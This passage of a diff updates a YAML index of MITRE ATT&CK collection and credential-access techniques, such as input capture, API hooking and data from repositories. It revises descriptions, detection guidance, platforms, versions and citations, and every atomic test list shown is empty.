       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -49371,12 +49922,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -49388,6 +49938,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -49395,11 +49948,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -49416,14 +49969,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -49439,6 +49989,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -49447,13 +49998,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -49461,15 +50012,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -49480,9 +50027,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -49528,7 +50126,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -49547,37 +50145,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -49600,41 +50197,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -49663,10 +50271,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -49679,10 +50286,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -49691,11 +50308,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -49732,7 +50352,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -49764,115 +50384,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
